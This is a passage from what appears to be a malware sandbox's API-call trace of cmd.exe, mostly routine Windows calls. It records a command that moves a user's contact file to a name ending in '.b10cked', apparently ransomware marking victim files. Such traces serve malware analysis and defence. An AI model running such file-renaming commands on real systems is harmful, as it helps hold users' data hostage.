0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 32870 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 32871 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 32872 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 32873 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 772 os_tid = 0xd24 [0219.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc9c | out: lpSystemTimeAsFileTime=0x2cfc9c*(dwLowDateTime=0xb7a372e0, dwHighDateTime=0x1d440a9)) [0219.516] GetCurrentProcessId () returned 0x694 [0219.516] GetCurrentThreadId () returned 0xd24 [0219.516] GetTickCount () returned 0x3d4bc [0219.516] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc94 | out: lpPerformanceCount=0x2cfc94*=27630545183) returned 1 [0219.517] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.517] __set_app_type (_Type=0x1) [0219.517] __p__fmode () returned 0x76b331f4 [0219.517] __p__commode () returned 0x76b331fc [0219.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.517] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0219.517] GetCurrentThreadId () returned 0xd24 [0219.517] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd24) returned 0x38 [0219.517] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.517] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.517] SetThreadUILanguage 
(LangId=0x0) returned 0x409 [0219.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfc2c | out: phkResult=0x2cfc2c*=0x0) returned 0x2 [0219.518] VirtualQuery (in: lpAddress=0x2cfc63, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0219.518] GetConsoleOutputCP () returned 0x1b5 [0219.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.519] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.519] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.524] GetEnvironmentStringsW () returned 0x70180* [0219.524] FreeEnvironmentStringsW (penv=0x70180) returned 1 [0219.524] GetEnvironmentStringsW () returned 0x70180* [0219.524] FreeEnvironmentStringsW (penv=0x70180) returned 1 [0219.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb9c | out: phkResult=0x2ceb9c*=0x40) returned 0x0 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0xa8, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x0, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: 
hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegCloseKey (hKey=0x40) returned 0x0 [0219.525] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb9c | out: phkResult=0x2ceb9c*=0x40) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x0, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 
lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegCloseKey (hKey=0x40) returned 0x0 [0219.525] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.525] srand (_Seed=0x5b8863b5) [0219.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" [0219.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" [0219.525] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.526] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, 
nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.526] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.526] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.526] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.526] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.526] GetEnvironmentStringsW () returned 0x722d0* [0219.526] FreeEnvironmentStringsW (penv=0x722d0) returned 1 [0219.526] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.526] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.526] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.526] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.526] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.526] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.526] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.526] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.526] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf968, lpFilePart=0x2cf964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x2cf964*="Desktop") returned 0x18 [0219.527] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.527] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.527] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.527] GetEnvironmentStringsW () returned 0x72af0* [0219.527] FreeEnvironmentStringsW (penv=0x72af0) returned 1 [0219.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.528] GetConsoleOutputCP () returned 0x1b5 [0219.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.528] GetUserDefaultLCID () returned 0x409 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="0") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="0") 
returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="1") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.530] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.531] GetConsoleTitleW (in: lpConsoleTitle=0x608e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.541] _wcsicmp (_String1="move", 
_String2=")") returned 68 [0219.541] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.541] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.541] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.541] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.541] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.541] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.543] GetConsoleTitleW (in: lpConsoleTitle=0x2cf7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.551] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.551] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.551] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.551] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.551] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.551] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.551] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.551] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.551] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.552] _wcsicmp (_String1="move", _String2="MD") returned 11 [0219.552] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.552] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.552] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.552] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.552] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.552] _wcsicmp 
(_String1="move", _String2="SHIFT") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.552] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.552] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.552] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.552] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.552] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0219.552] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.552] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.553] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf55c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 
[0219.554] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.554] _wcsnicmp 
(_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.555] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2=".") returned 65 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2="..") returned 65 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh~1.con")) returned 0x20 [0219.555] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x71e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.555] SetErrorMode (uMode=0x0) returned 0x0 [0219.555] SetErrorMode (uMode=0x1) returned 0x0 [0219.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", nBufferLength=0x104, lpBuffer=0x2ceee4, lpFilePart=0x2ceecc | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", lpFilePart=0x2ceecc*="OFHBNH~1.CON") returned 0x26 [0219.555] SetErrorMode (uMode=0x0) returned 0x1 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2=".") returned 65 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2="..") returned 65 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh~1.con")) returned 0x20 [0219.555] SetErrorMode (uMode=0x0) returned 0x0 [0219.555] SetErrorMode (uMode=0x1) returned 0x0 [0219.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", nBufferLength=0x104, lpBuffer=0x2cf360, lpFilePart=0x2cf0f8 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", lpFilePart=0x2cf0f8*="OFHBNH~1.CON") returned 0x26 [0219.556] SetErrorMode (uMode=0x0) returned 0x1 [0219.556] SetErrorMode (uMode=0x0) returned 0x0 [0219.556] SetErrorMode (uMode=0x1) returned 0x0 [0219.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", nBufferLength=0x104, lpBuffer=0x2cf568, lpFilePart=0x2cf0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", lpFilePart=0x2cf0f8*="ofhbnh edferrr.contact.b10cked") returned 0x38 [0219.556] SetErrorMode (uMode=0x0) returned 0x1 [0219.556] SetLastError (dwErrCode=0x0) [0219.556] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.b10cked")) returned 0xffffffff [0219.556] GetLastError () returned 0x2 [0219.556] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2cea74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea74) returned 0x60e68 [0219.556] FindNextFileW (in: hFindFile=0x60e68, lpFindFileData=0x2cea74 | out: lpFindFileData=0x2cea74) returned 0 [0219.556] GetLastError () returned 0x12 [0219.556] FindClose (in: hFindFile=0x60e68 | out: hFindFile=0x60e68) returned 1 [0219.557] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x71bd8, fSearchOp=0x0, 